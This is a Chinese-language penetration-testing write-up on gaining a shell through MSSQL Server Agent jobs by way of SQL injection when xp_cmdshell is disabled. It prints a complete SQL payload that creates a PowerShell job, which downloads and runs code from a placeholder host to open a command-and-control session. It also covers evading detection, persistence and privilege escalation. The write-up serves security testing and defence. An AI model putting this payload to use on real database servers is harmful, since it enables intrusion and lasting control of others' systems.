MSSQL代理工作服务器远程命令执行

概述

如果MSSQL数据库中开启了MSSQL Server Agent Job服务的话，攻击者将可以利用MSSQL Server中自带的功能来获取一个shell。

SQL Server Agent

SQL Server Agent是一个Windows服务，它可以用来执行自动化任务。

攻击浅析

利用MSSQL Server中的本地功能来在Windows操作系统中执行任意命令。在整个测试过程中，xp_cmdshell存储过程已被禁用了，并且限制了创建自定义存储过程的能力。

当xp_cmdshell扩展存储过程在攻击中被使用时，大多数安全监控或检测系统都会产生警报。而攻击者和渗透测试人员对xp_cmdshell的滥用已经导致很多组织和企业开始禁用或限制xp_cmdshell了。

可利用MSSQL Server代理来在目标数据库服务器中执行任意控制命令。但是，目标服务器必须满足一下几个条件：

1. 目标服务器必须开启了MSSQL Server代理服务；
2. 服务器中当前运行的用户账号必须拥有足够的权限去创建并执行代理作业；

两个可以利用的MSSQL代理作业子系统：CmdExec和PowerShell子系统，这两个功能可以分别用来执行操作系统命令和PowerShell脚本。

可以使用SQL注入点来创建并执行代理任务。任务所需执行的命令是一段PowerShell代码，这段代码可以让目标系统与一个受Optiv控制的IP地址进行通信连接，然后下载额外的PowerShell指令。这样一来，就可以在目标数据库服务器与Optiv控制的服务器之间建立一条可交互的命令控制会话了。

下面这张代码截图显示的是已被拆分的SQL语句。在下面这段下载命令中，URI位于两个单引号之间，而不是之前的双引号。这样做是为了在SQL语句中转义单引号。

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

攻击测试

如下图所示，SQL语句已经进行了URL编码处理。在这个攻击示例中，攻击是通过HTTP GET请求来发送的，因此我们需要对攻击payload进行URL编码。

可以看到我们在HTTP GET请求的参数中添加了SQL注入payload，这样我们就可以使用SQL注入了。（请注意在payload的开头处添加的%20（空格符））

当payload运行之后，我们就可以看到命令控制会话已经建立成功了，并且使用的是“SQLSERVERAGENT”账号的权限。

在目标主机的SQL Server中，我们可以看到SQL代理作业已经创建成功了。

总结

如果目标主机运行了MSSQL代理服务，并且代理服务使用的用户账号可以访问其他的MSSQL Server的话，那么就可以利用这种攻击来在其他的MSSQL Server中执行MSSQL Server代理作业了。除此之外，还可以设置定时代理作业，这也就意味着，不仅可以利用这种方式来躲避安全检测，而且还可以实现对目标MSSQL Server的持久化控制。

在某些情况下，如果MSSQL Server代理服务使用的是权限更高的用户账号，那么就可以通过这种攻击来实现提权。